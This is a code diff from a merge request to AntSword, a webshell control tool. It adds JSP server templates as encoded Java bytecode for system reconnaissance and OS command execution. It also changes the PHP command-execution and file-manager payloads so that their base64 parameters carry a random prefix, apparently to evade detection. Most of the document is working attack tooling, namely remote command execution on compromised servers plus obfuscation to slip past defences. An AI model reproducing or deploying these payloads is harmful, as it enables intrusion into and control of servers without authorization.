Merge pull request #247 from yzddmr6/v2.1.x

其他参数增加随机前缀

source/app.entry.js

@@ -165,12 +165,14 @@ antSword['encoders'] = (function () {
   var encoders = {
     asp: [],
     aspx: [],
+    jsp: [],
     php: [],
     custom: []
   };
   var encoders_path = {
     asp: [],
     aspx: [],
+    jsp: [],
     php: [],
     custom: []
   };
@@ -179,7 +181,7 @@ antSword['encoders'] = (function () {
   !fs.existsSync(userencoder_path) ?
     fs.mkdirSync(userencoder_path) :
     null;
-  ['asp', 'aspx', 'php', 'custom'].map((t) => {
+  ['asp', 'aspx', 'php', 'jsp', 'custom'].map((t) => {
     !fs.existsSync(path.join(userencoder_path, `${t}`)) ?
       fs.mkdirSync(path.join(userencoder_path, `${t}`)) :
       null;
@@ -219,12 +221,14 @@ antSword['decoders'] = (function () {
     asp: [],
     aspx: [],
     php: [],
+    jsp: [],
     custom: []
   };
   var decoders_path = {
     asp: [],
     aspx: [],
     php: [],
+    jsp: [],
     custom: []
   };
   let userdecoder_path = path.join(remote.process.env.AS_WORKDIR, 'antData/encoders');
@@ -232,7 +236,7 @@ antSword['decoders'] = (function () {
   !fs.existsSync(userdecoder_path) ?
     fs.mkdirSync(userdecoder_path) :
     null;
-  ['asp', 'aspx', 'php', 'custom'].map((t) => {
+    ['asp', 'aspx', 'php', 'jsp', 'custom'].map((t) => {
     !fs.existsSync(path.join(userdecoder_path, `${t}`)) ?
       fs.mkdirSync(path.join(userdecoder_path, `${t}`)) :
       null;

source/core/base.js

@@ -129,7 +129,9 @@ class Base {
    * @param  {String} encode [字符串编码，默认utf8]
    * @return {Object}        [返回字符串处理函数对象]
    */
-  format(encode) {
+  format(opts) {
+    let encode = opts['encode'];
+    let randomPrefix = parseInt(opts.otherConf["random-Prefix"]);
     return {
       /**
        * base64编码
@@ -139,6 +141,20 @@ class Base {
       base64(str) {
         return Buffer.from(iconv.encode(Buffer.from(str), encode)).toString('base64');
       },
+      /**
+       * 增加随机前缀的base64编码
+       * @param  {String} str 字符串
+       * @return {String}     编码后的字符串
+       */
+      newbase64(str) {
+        let randomString = (length) => {
+          let chars = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
+          let result = '';
+          for (let i = length; i > 0; --i) result += chars[Math.floor(Math.random() * chars.length)];
+          return result;
+        }
+        return randomString(randomPrefix) + Buffer.from(iconv.encode(Buffer.from(str), encode)).toString('base64');
+      },
       /**
        * 字符串转16进制（不进行编码转换
        * @param  {String} str 转换的字符串
@@ -175,10 +191,9 @@ class Base {
     // 加载模板
     let _argv = this.argv();
     let templateObj = require(`${tpl}`)(_argv[0], _argv[1], _argv[2], _argv[3], _argv[4], _argv[5]);
-    // let formatter = new this.format(this.__opts__['encode']);
     let formatter = Base
       .prototype
-      .format(this.__opts__['encode']);
+      .format(this.__opts__);
     // 解析模板
     for (let funcName in templateObj) {
       this[templateName][funcName] = ((args) => {
@@ -211,6 +226,7 @@ class Base {
                 })
             }
             // 发送HTTP请求
+            data['_'] = data['_'].replace(/#randomPrefix#/g, this.__opts__.otherConf["random-Prefix"]);
             return data;
           }
         } else {
@@ -331,6 +347,7 @@ class Base {
           chunkStepMax: (this.__opts__['otherConf'] || {})['chunk-step-byte-max'] || 3,
           useMultipart: (this.__opts__['otherConf'] || {})['use-multipart'] === 1,
           addMassData: (this.__opts__['otherConf'] || {})['add-MassData'] === 1,
+          randomPrefix: parseInt((this.__opts__['otherConf'] || {})['random-Prefix']),
           useRandomVariable: (this.__opts__['otherConf'] || {})['use-random-variable'] === 1,
           timeout: parseInt((this.__opts__['otherConf'] || {})['request-timeout']),
           headers: (this.__opts__['httpConf'] || {})['headers'] || {},
@@ -384,6 +401,7 @@ class Base {
           chunkStepMax: (this.__opts__['otherConf'] || {})['chunk-step-byte-max'] || 3,
           useMultipart: (this.__opts__['otherConf'] || {})['use-multipart'] === 1,
           addMassData: (this.__opts__['otherConf'] || {})['add-MassData'] === 1,
+          randomPrefix: parseInt((this.__opts__['otherConf'] || {})['random-Prefix']),
           useRandomVariable: (this.__opts__['otherConf'] || {})['use-random-variable'] === 1,
           timeout: parseInt((this.__opts__['otherConf'] || {})['request-timeout']),
           headers: (this.__opts__['httpConf'] || {})['headers'] || {},

source/core/index.js

@@ -14,7 +14,7 @@ class Core {
   constructor() {
     // 加载子模块列表
     let cores = {};
-    ['php', 'asp', 'aspx', 'custom', 'php4'].map((_) => {
+    ['php', 'asp', 'aspx', 'jsp', 'custom', 'php4'].map((_) => {
       cores[_] = require(`./${_}/index`);
     });
     // 返回子模块对象

source/core/jsp/decoder/default.js

+/**
+ * JSP::default解码器
+ */
+
+'use strict';
+
+module.exports = {
+  asoutput: () => {
+    return ``.replace(/\n\s+/g, '');
+  },
+  decode_buff: (data) => {
+    return data;
+  }
+}
\ No newline at end of file

source/core/jsp/encoder/base64.js

+//
+// jsp::base64 编码模块
+//
+// :把除了密码跟api的其他参数都base64编码一次
+//
+
+'use strict';
+
+module.exports = (pwd, data, ext = null) => {
+  let ret = {};
+  for (let _ in data) {
+    if (_ === '_') {
+      continue
+    };
+    ret[_] = Buffer
+      .from(data[_])
+      .toString('base64');
+  }
+  if (ext.opts['encode'] != "UTF8") {
+    ret['charset'] = ext.opts['encode'];
+  }
+  if (ext.opts['encoder'] != "default") {
+    ret['encoder'] = ext.opts['encoder'];
+  }
+  if (ext.opts['decoder'] != "default") {
+    ret['decoder'] = ext.opts['decoder'];
+  }
+  ret[pwd] = data['_'];
+  return ret;
+}
\ No newline at end of file

source/core/jsp/encoder/hex.js

+//
+// 16进制编码模块
+//
+
+'use strict';
+
+module.exports = (pwd, data, ext = null) => {
+  let ret = {};
+  for (let _ in data) {
+    if (_ === '_') {
+      continue
+    };
+    ret[_] = Buffer
+      .from(data[_])
+      .toString('hex');
+  }
+  if (ext.opts['encode'] != "UTF8") {
+    ret['charset'] = ext.opts['encode'];
+  }
+  if (ext.opts['encoder'] != "default") {
+    ret['encoder'] = ext.opts['encoder'];
+  }
+  if (ext.opts['decoder'] != "default") {
+    ret['decoder'] = ext.opts['decoder'];
+  }
+  ret[pwd] = data['_'];
+  return ret;
+}
\ No newline at end of file

source/core/jsp/index.js

+/**
+ * JSP服务端脚本模板
+ * 作者：yzddMr6
+ */
+'use strict';
+
+
+const Base = require('../base');
+
+class JSP extends Base {
+  constructor(opts) {
+    super(opts);
+    // 解析模板
+    [
+      'base',
+      'command',
+      'filemanager',
+      'database/sqlserver',
+      'database/mysql',
+      'database/oracle'
+    ].map((_) => {
+      this.parseTemplate(`./jsp/template/${_}`);
+    });
+    // 解析编码器
+    this
+      .encoders
+      .map((_) => {
+        this.parseEncoder(`./jsp/encoder/${_}`);
+      });
+    this
+      .decoders
+      .map((_) => {
+        this.parseDecoder(`./jsp/decoder/${_}`);
+      });
+  }
+
+  /**
+   * 获取编码器列表
+   * @return {array} 编码器列表
+   */
+  get encoders() {
+    return ['base64','hex'];
+  }
+
+  get decoders() {
+    return ['default'];
+  }
+
+  /**
+   * HTTP请求数据组合函数
+   * @param  {Object} data 通过模板解析后的代码对象
+   * @return {Promise}     返回一个Promise操作对象
+   */
+  complete(data, force_default = false) {
+    // 分隔符号
+    let tag_s, tag_e;
+    if (this.__opts__['otherConf'].hasOwnProperty('use-custom-datatag') && this.__opts__['otherConf']['use-custom-datatag'] == 1 && this.__opts__['otherConf']['custom-datatag-tags']) {
+      tag_s = this.__opts__['otherConf']['custom-datatag-tags'];
+    } else {
+      tag_s = "->|";
+    }
+    if (this.__opts__['otherConf'].hasOwnProperty('use-custom-datatag') && this.__opts__['otherConf']['use-custom-datatag'] == 1 && this.__opts__['otherConf']['custom-datatag-tage']) {
+      tag_e = this.__opts__['otherConf']['custom-datatag-tage'];
+    } else {
+      tag_e = "|<-";
+    }
+    // 使用编码器进行处理并返回
+    return this.encodeComplete(tag_s, tag_e, data);
+  }
+}
+
+module.exports = JSP;
\ No newline at end of file

source/core/jsp/template/base.js

+//
+// 基础信息模板
+// 获取：当前路径、磁盘列表
+//
+
+module.exports = () => ({
+  info: 'yv66vgAAADIAtQoANgBNBwBOCgACAE8KAAIAUAgAUQsAUgBTCABUBwBVCABWCgAIAFcIAFgLAFkAWgsAUgBbCwBZAFsIAFwKAAgAXQcAXgoANQBfCgAIAGAIAGEKAAIAYgoAYwBkBwBlBwBmCgAYAE0IAGcKABgAaAoAFwBgCgAYAGALABEAaQsAagBrCABsCwBtAG4KADYAbwoAcABxCgByAHMHAHQKACUAVwoAJQB1CgB2AHcKAHYAeAoAdgB5CgB2AHoIAHsKAHwAfQgAfgoANQB/CACACgB2AIEKAHYAggoAJQCDCgAlAGAHAEYHAIQBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQAGZXF1YWxzAQAVKExqYXZhL2xhbmcvT2JqZWN0OylaAQANU3RhY2tNYXBUYWJsZQcATgcAhQcAhgcAhwcARgcAhAcAVQcAZQEAC1N5c0luZm9Db2RlAQA7KExqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0OylMamF2YS9sYW5nL1N0cmluZzsBAA9Xd3dSb290UGF0aENvZGUBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwcAiAEAClNvdXJjZUZpbGUBABBTeXNJbmZvQ29kZS5qYXZhDAA3ADgBAB1qYXZheC9zZXJ2bGV0L2pzcC9QYWdlQ29udGV4dAwAiQCKDACLAIwBAAdjaGFyc2V0BwCFDACNAEkBAAVVVEYtOAEAFmphdmEvbGFuZy9TdHJpbmdCdWZmZXIBAAAMADcAjgEACXRleHQvaHRtbAcAhgwAjwCODACQAI4BAAMtPnwMAJEAkgEAJWphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3QMAEYARwwAkwCUAQADfDwtDACVAJYHAJcMAJgAjgEAE2phdmEvbGFuZy9FeGNlcHRpb24BABdqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcgEACUVSUk9SOi8vIAwAkQCZDACaAJsHAJwMAJ0AngEAAS8HAJ8MAKAASQwAoQCiBwCjDACkAKUHAKYMAKcAlAEADGphdmEvaW8vRmlsZQwAqACUBwCHDACpAKoMAKsArAwArQCUDACuAK8BAAdvcy5uYW1lBwCwDACxAEkBAAl1c2VyLm5hbWUMAEgASQEAAQkMAK4AsgwAOwA8DACzALQBABBqYXZhL2xhbmcvT2JqZWN0AQAcamF2YXgvc2VydmxldC9TZXJ2bGV0UmVxdWVzdAEAHWphdmF4L3NlcnZsZXQvU2VydmxldFJlc3BvbnNlAQAQamF2YS9sYW5nL1N0cmluZwEAD1tMamF2YS9pby9GaWxlOwEACmdldFJlcXVlc3QBACAoKUxqYXZheC9zZXJ2bGV0L1NlcnZsZXRSZXF1ZXN0OwEAC2dldFJlc3BvbnNlAQAhKClMamF2YXgvc2VydmxldC9TZXJ2bGV0UmVzcG9uc2U7AQAMZ2V0UGFyYW1ldGVyAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWAQAOc2V0Q29udGVudFR5cGUBABRzZXRDaGFyYWN0ZXJFbmNvZGluZwEABmFwcGVuZAEALChMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmdCdWZmZXI7AQAIdG9TdHJpbmcBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEABmdldE91dAEAHygpTGphdmF4L3NlcnZsZXQvanNwL0pzcFdyaXRlcjsBABtqYXZheC9zZXJ2bGV0L2pzcC9Kc3BXcml0ZXIBAAVwcmludAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmdCdWlsZGVyOwEACmdldFNlc3Npb24BACIoKUxqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlc3Npb247AQAeamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXNzaW9uAQARZ2V0U2VydmxldENvbnRleHQBACAoKUxqYXZheC9zZXJ2bGV0L1NlcnZsZXRDb250ZXh0OwEAHGphdmF4L3NlcnZsZXQvU2VydmxldENvbnRleHQBAAtnZXRSZWFsUGF0aAEACGdldENsYXNzAQATKClMamF2YS9sYW5nL0NsYXNzOwEAD2phdmEvbGFuZy9DbGFzcwEAC2dldFJlc291cmNlAQAiKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9uZXQvVVJMOwEADGphdmEvbmV0L1VSTAEAB2dldFBhdGgBAAlnZXRQYXJlbnQBAAZjaGFyQXQBAAQoSSlDAQAHdmFsdWVPZgEAFShDKUxqYXZhL2xhbmcvU3RyaW5nOwEAC3RvVXBwZXJDYXNlAQAJc3Vic3RyaW5nAQAVKEkpTGphdmEvbGFuZy9TdHJpbmc7AQAQamF2YS9sYW5nL1N5c3RlbQEAC2dldFByb3BlcnR5AQAWKElJKUxqYXZhL2xhbmcvU3RyaW5nOwEACWxpc3RSb290cwEAESgpW0xqYXZhL2lvL0ZpbGU7ACEANQA2AAAAAAAEAAEANwA4AAEAOQAAAB0AAQABAAAABSq3AAGxAAAAAQA6AAAABgABAAAABwABADsAPAABADkAAAFSAAMACQAAALMrwAACTSy2AANOLLYABDoELRIFuQAGAgDGAA4tEgW5AAYCAKcABRIHOgW7AAhZEgm3AAo6BrsACFkSCbcACjoHGQQSC7kADAIALRkFuQANAgAZBBkFuQAOAgAZBhIPtgAQVxkHKi3AABG2ABK2ABBXGQYZB7YAE7YAEFcZBhIUtgAQVyy2ABUZBrYAE7YAFqcAIjoIGQe7ABhZtwAZEhq2ABsZCLYAHLYAG7YAHbYAEFcErAABAEAAjwCSABcAAgA6AAAASgASAAAACgAFAAsACgAMABAADQAqAA4ANQAPAEAAEQBJABIAUQATAFoAFABiABUAcAAWAHsAFwCDABgAjwAbAJIAGQCUABoAsQAcAD0AAAA1AAT+ACYHAD4HAD8HAEBBBwBB/wBpAAgHAEIHAEMHAD4HAD8HAEAHAEEHAEQHAEQAAQcARR4AAABGAEcAAQA5AAABLwADAAYAAADHEglNK7kAHgEAuQAfAQASILkAIQIAxgAZK7kAHgEAuQAfAQASILkAIQIATacAHCq2ACISILYAI7YAJE67ACVZLbcAJrYAJ02nAB9OKrYAIhIgtgAjtgAkOgS7ACVZGQS3ACa2ACdNuwAYWbcAGSwDtgAouAAptgAqtgAbLAS2ACu2ABu2AB1NEiy4AC1OEi64AC06BCostgAvOgW7ABhZtwAZLLYAGxIwtgAbGQW2ABsSMLYAGy22ABsSMLYAGxkEtgAbtgAdsAABAAMARwBKABcAAgA6AAAAOgAOAAAAIAADACIAGAAjAC4AJQA7ACYARwArAEoAKABLACkAWQAqAGYALACHAC0AjQAuAJQALwCbADAAPQAAAA4ABPwALgcAQRhCBwBFGwAAAEgASQABADkAAACwAAQABQAAAGESCU0rAwS2ADESILYAMpoAPbgAM04DNgQVBC2+ogAsuwAYWbcAGSy2ABstFQQytgA0AwW2ADG2ABsSCbYAG7YAHU2EBAGn/9OnABe7ABhZtwAZLLYAGxIgtgAbtgAdTSywAAAAAgA6AAAAJgAJAAAAMwADADQAEQA1ABUANgAfADcAQgA2AEgAOQBLADoAXwA8AD0AAAARAAT+ABgHAEEHAEoB+QAvAhMAAQBLAAAAAgBM',
+  probedb: 'Z', // 检测数据库函数支持
+})
\ No newline at end of file

source/core/jsp/template/command.js

+//
+// 命令执行模板
+//
+
+module.exports = () => ({
+  exec: {
+    _: 'yv66vgAAADIA7goATABrBwBsCgACAG0KAAIAbggAbwsAcABxCAByCABzCAB0BwB1CgAKAHYIAHcLAHgAeQsAcAB6CwB4AHoHAHsKABAAawgAfAoAEAB9CgAQAH4KAEsAfwoASwCACACBCACCCgAKAIMKAEsAhAoACgB+CACFCgACAIYKAIcAiAcAiQgAigoAHwB+CACLCgAkAIwHAI0KACQAjgoAJACPCACQCACRCgAkAJIHAJMKACQAlAoAKgCVCgAkAJYKACQAlwoAEACYCACZCgAqAJoKACoAmwgAnAcAnQoANABrCgA0AJ4KAEsAnwgAoAgAoQoAogCjCgCiAKQKAKUApgoASwCnCgClAKgIAKkKAKoAqwoAJACsCACtCgAkAK4HAK8HALAKAEUAsQoARACyCgBEALMIALQKAEQAtQcAYQcAtgEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAAZlcXVhbHMBABUoTGphdmEvbGFuZy9PYmplY3Q7KVoBAA1TdGFja01hcFRhYmxlBwBsBwC3BwC4BwCNBwBhBwC2BwB1BwCJAQACRUMBAEooTGphdmEvbGFuZy9TdHJpbmc7TGphdmEvbGFuZy9TdHJpbmc7TGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEACkV4Y2VwdGlvbnMBAAZkZWNvZGUHAJMBABJFeGVjdXRlQ29tbWFuZENvZGUHALkBAAVpc1dpbgEAAygpWgEAD0NvcHlJbnB1dFN0cmVhbQEAQihMamF2YS9pby9JbnB1dFN0cmVhbTtMamF2YS9sYW5nL1N0cmluZ0J1ZmZlcjtMamF2YS9sYW5nL1N0cmluZzspVgcArwcAugEAClNvdXJjZUZpbGUBABdFeGVjdXRlQ29tbWFuZENvZGUuamF2YQwATQBOAQAdamF2YXgvc2VydmxldC9qc3AvUGFnZUNvbnRleHQMALsAvAwAvQC+AQAHZW5jb2RlcgcAtwwAvwDAAQAAAQAHY2hhcnNldAEABVVURi04AQAWamF2YS9sYW5nL1N0cmluZ0J1ZmZlcgwATQDBAQAJdGV4dC9odG1sBwC4DADCAMEMAMMAwQEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyAQAEdmFyMQwAxADFDADGAMcMAF8AXQwAXABdAQAEdmFyMgEAAy0+fAwAxADIDABhAF0BAAN8PC0MAMkAygcAywwAzADBAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEACUVSUk9SOi8vIAEAA2hleAwAUQBSAQAQamF2YS9sYW5nL1N0cmluZwwAzQDODABNAM8BAARudWxsAQAQMDEyMzQ1Njc4OUFCQ0RFRgwA0ADHAQAdamF2YS9pby9CeXRlQXJyYXlPdXRwdXRTdHJlYW0MANEA0gwATQDTDADUANUMANYA1wwAxADYAQABLAwA2QDTDADGAMABAAZiYXNlNjQBABZzdW4vbWlzYy9CQVNFNjREZWNvZGVyDADaANsMAGMAZAEAAi1jAQACL2MHANwMAN0A3gwA3wDgBwDhDADiAOMMAGUAZgwA5ADjAQAHb3MubmFtZQcA5QwA5gDADADnAMcBAAN3aW4MAOgA6QEAFmphdmEvaW8vQnVmZmVyZWRSZWFkZXIBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDABNAOoMAE0A6wwA7ADHAQACDQoMAO0ATgEAEGphdmEvbGFuZy9PYmplY3QBABxqYXZheC9zZXJ2bGV0L1NlcnZsZXRSZXF1ZXN0AQAdamF2YXgvc2VydmxldC9TZXJ2bGV0UmVzcG9uc2UBABNbTGphdmEvbGFuZy9TdHJpbmc7AQATamF2YS9pby9JbnB1dFN0cmVhbQEACmdldFJlcXVlc3QBACAoKUxqYXZheC9zZXJ2bGV0L1NlcnZsZXRSZXF1ZXN0OwEAC2dldFJlc3BvbnNlAQAhKClMamF2YXgvc2VydmxldC9TZXJ2bGV0UmVzcG9uc2U7AQAMZ2V0UGFyYW1ldGVyAQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsBABUoTGphdmEvbGFuZy9TdHJpbmc7KVYBAA5zZXRDb250ZW50VHlwZQEAFHNldENoYXJhY3RlckVuY29kaW5nAQAGYXBwZW5kAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZ0J1aWxkZXI7AQAIdG9TdHJpbmcBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEALChMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmdCdWZmZXI7AQAGZ2V0T3V0AQAfKClMamF2YXgvc2VydmxldC9qc3AvSnNwV3JpdGVyOwEAG2phdmF4L3NlcnZsZXQvanNwL0pzcFdyaXRlcgEABXByaW50AQAIZ2V0Qnl0ZXMBAAQoKVtCAQAXKFtCTGphdmEvbGFuZy9TdHJpbmc7KVYBAAt0b1VwcGVyQ2FzZQEABmxlbmd0aAEAAygpSQEABChJKVYBAAZjaGFyQXQBAAQoSSlDAQAHaW5kZXhPZgEABChJKUkBABwoSSlMamF2YS9sYW5nL1N0cmluZ0J1aWxkZXI7AQAFd3JpdGUBAAxkZWNvZGVCdWZmZXIBABYoTGphdmEvbGFuZy9TdHJpbmc7KVtCAQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAKChbTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBABFqYXZhL2xhbmcvUHJvY2VzcwEADmdldElucHV0U3RyZWFtAQAXKClMamF2YS9pby9JbnB1dFN0cmVhbTsBAA5nZXRFcnJvclN0cmVhbQEAEGphdmEvbGFuZy9TeXN0ZW0BAAtnZXRQcm9wZXJ0eQEAC3RvTG93ZXJDYXNlAQAKc3RhcnRzV2l0aAEAFShMamF2YS9sYW5nL1N0cmluZzspWgEAKihMamF2YS9pby9JbnB1dFN0cmVhbTtMamF2YS9sYW5nL1N0cmluZzspVgEAEyhMamF2YS9pby9SZWFkZXI7KVYBAAhyZWFkTGluZQEABWNsb3NlACEASwBMAAAAAAAHAAEATQBOAAEATwAAAB0AAQABAAAABSq3AAGxAAAAAQBQAAAABgABAAAACQABAFEAUgABAE8AAAHfAAUACwAAAScrwAACTSy2AANOLLYABDoELRIFuQAGAgDGAA4tEgW5AAYCAKcABRIHOgUtEgi5AAYCAMYADi0SCLkABgIApwAFEgk6BrsAClkSB7cACzoHuwAKWRIHtwALOggZBBIMuQANAgAtGQa5AA4CABkEGQa5AA8CACoquwAQWbcAES0SErkABgIAtgATEge2ABO2ABQZBRkGtgAVGQUZBrYAFjoJKiq7ABBZtwARLRIXuQAGAgC2ABMSB7YAE7YAFBkFGQa2ABUZBRkGtgAWOgoZBxIYtgAZVxkIKhkJGQoZBrYAGrYAGVcZBxkItgAbtgAZVxkHEhy2ABlXLLYAHRkHtgAbtgAepwAiOgkZCLsAEFm3ABESILYAExkJtgAhtgATtgAUtgAZVwSsAAEAWgEDAQYAHwACAFAAAABWABUAAAAMAAUADQAKAA4AEAAPACoAEABEABEATwASAFoAFABjABUAawAWAHQAFwCgABgAzAAZANQAGgDkABsA7wAcAPcAHQEDACABBgAeAQgAHwElACEAUwAAAEIABv4AJgcAVAcAVQcAVkEHAFf8ABcHAFdBBwBX/wDDAAkHAFgHAFkHAFQHAFUHAFYHAFcHAFcHAFoHAFoAAQcAWx4AAABcAF0AAgBPAAAARAAEAAQAAAAeLBIitgAjmgAJLBIipgAFK7C7ACRZK7YAJS23ACawAAAAAgBQAAAACgACAAAAJAARACUAUwAAAAQAAg8BAF4AAAAEAAEAHwAAAF8AXQACAE8AAAFoAAYACAAAANwsEiK2ACOaAAksEiKmAJ8rEielAAwrEie2ACOZAAYSB7ASKDoEK7YAKUy7ACpZK7YAKwVstwAsOgUSBzoGAzYHFQcrtgArogBduwAQWbcAERkGtgATGQQrFQe2AC22AC4HeBkEKxUHBGC2AC22AC6AtgAvEjC2ABO2ABQ6BhkFGQQrFQe2AC22AC4HeBkEKxUHBGC2AC22AC6AtgAxhAcCp/+gGQUSCbYAMrAsEjO2ACOaAAksEjOmACMBOgS7ADRZtwA1OgUZBSu2ADY6BLsAJFkZBBIJtwAmsCuwAAAAAgBQAAAASgASAAAAKAAPACkAHgAqACEALAAlAC0AKgAuADkALwA9ADAASQAxAH0AMgCdADAAowA0AKsANQC6ADYAvQA3AMYAOADOADkA2gA7AFMAAAAqAAgPDgL/AB4ACAcAWAcAVwcAVwcAVwcAVwcAYAcAVwEAAPoAYvgABw4fAF4AAAAEAAEAHwAAAGEAXQACAE8AAADDAAQABwAAAFK7AApZEge3AAs6BAa9ACRZAytTWQQqtgA3mgAIEjinAAUSOVNZBSxTOgW4ADoZBbYAOzoGKhkGtgA8GQQttgA9KhkGtgA+GQQttgA9GQS2ABuwAAAAAgBQAAAAGgAGAAAAPgALAD8AKgBAADQAQQBAAEIATABDAFMAAAA/AAL/ACEABQcAWAcAVwcAVwcAVwcAWgADBwBiBwBiAf8AAQAFBwBYBwBXBwBXBwBXBwBaAAQHAGIHAGIBBwBXAF4AAAAEAAEAHwAAAGMAZAABAE8AAABOAAIAAgAAABgSP7gAQEwrtgBBTCsSQrYAQ5kABQSsA6wAAAACAFAAAAAWAAUAAABGAAYARwALAEgAFABJABYASgBTAAAACAAB/AAWBwBXAAAAZQBmAAIATwAAAI8ABgAGAAAAP7sARFm7AEVZKy23AEa3AEc6BRkFtgBIWToExgAfLLsAEFm3ABEZBLYAExJJtgATtgAUtgAZV6f/3BkFtgBKsQAAAAIAUAAAABYABQAAAE4AEgBPAB0AUAA5AFIAPgBTAFMAAAAiAAL9ABIABwBn/wAmAAYHAFgHAGgHAFoHAFcHAFcHAGcAAABeAAAABAABAB8AAQBpAAAAAgBq',
+    'var1': '#{bin}',
+    'var2': '#{cmd}',
+  },
+  listcmd: {
+    _: 'Y',
+    'z1': '#{binarr}'
+  }
+})
\ No newline at end of file

source/core/jsp/template/database/mysql.js

+/*
+<T>XDB</T>
+<X>
+com.mysql.jdbc.Driver
+jdbc:mysql://localhost/test?user=root&password=123456
+</X>
+*/
+
+module.exports = require('./default');
\ No newline at end of file

source/core/jsp/template/database/sqlserver.js

+/*
+<T>XDB</T>
+<X>
+com.microsoft.sqlserver.jdbc.SQLServerDriver
+jdbc:sqlserver://127.0.0.1:1433;databaseName=test;user=sa;password=123456
+</X>
+*/
+
+module.exports = require('./default');
\ No newline at end of file

source/core/php/template/command.js

@@ -4,9 +4,9 @@
 
 module.exports = (arg1, arg2, arg3) => ({
   exec: {
-    _: `$p=base64_decode($_POST["${arg1}"]);
-      $s=base64_decode($_POST["${arg2}"]);
-      $envstr=@base64_decode($_POST["${arg3}"]);
+    _: `$p=base64_decode(substr($_POST["${arg1}"],#randomPrefix#));
+      $s=base64_decode(substr($_POST["${arg2}"],#randomPrefix#));
+      $envstr=@base64_decode(substr($_POST["${arg3}"],#randomPrefix#));
       $d=dirname($_SERVER["SCRIPT_FILENAME"]);
       $c=substr($d,0,1)=="/"?"-c \\"{$s}\\"":"/c \\"{$s}\\"";
       if(substr($d,0,1)=="/"){
@@ -102,20 +102,20 @@ module.exports = (arg1, arg2, arg3) => ({
       };
       $ret=@runcmd($r." 2>&1");
       print ($ret!=0)?"ret={$ret}":"";`.replace(/\n\s+/g, ''),
-    [arg1]: "#{base64::bin}",
-    [arg2]: "#{base64::cmd}",
-    [arg3]: "#{base64::env}"
+    [arg1]: "#{newbase64::bin}",
+    [arg2]: "#{newbase64::cmd}",
+    [arg3]: "#{newbase64::env}"
   },
   listcmd: {
-    _: `$arr=explode(",",base64_decode($_POST["${arg1}"]));
+    _: `$arr=explode(",",base64_decode(substr($_POST["${arg1}"],#randomPrefix#)));
     foreach($arr as $v){
         echo($v."\t".(file_exists($v)?"1":"0")."\n");
     }`.replace(/\n\s+/g, ''),
-    [arg1]: "#{base64::binarr}"
+    [arg1]: "#{newbase64::binarr}"
   },
   quote: {
-    _: `$p=base64_decode($_POST["${arg1}"]);$s=base64_decode($_POST["${arg2}"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \\"{$s}\\"":"/c \\"{$s}\\"";$r="{$p} {$c}";echo \`{$r} 2>&1\``,
-    [arg1]: "#{base64::bin}",
-    [arg2]: "#{base64::cmd}"
+    _: `$p=base64_decode(substr($_POST["${arg1}"],#randomPrefix#));$s=base64_decode(substr($_POST["${arg2}"],#randomPrefix#));$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \\"{$s}\\"":"/c \\"{$s}\\"";$r="{$p} {$c}";echo \`{$r} 2>&1\``,
+    [arg1]: "#{newbase64::bin}",
+    [arg2]: "#{newbase64::cmd}"
   }
 })
\ No newline at end of file

source/core/php/template/filemanager.js

@@ -4,69 +4,69 @@
 
 module.exports = (arg1, arg2, arg3) => ({
   dir: {
-    _: `$D=base64_decode($_POST["${arg1}"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);}`,
-    [arg1]: "#{base64::path}"
+    _: `$D=base64_decode(substr($_POST["${arg1}"],#randomPrefix#));$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);}`,
+    [arg1]: "#{newbase64::path}"
   },
 
   delete: {
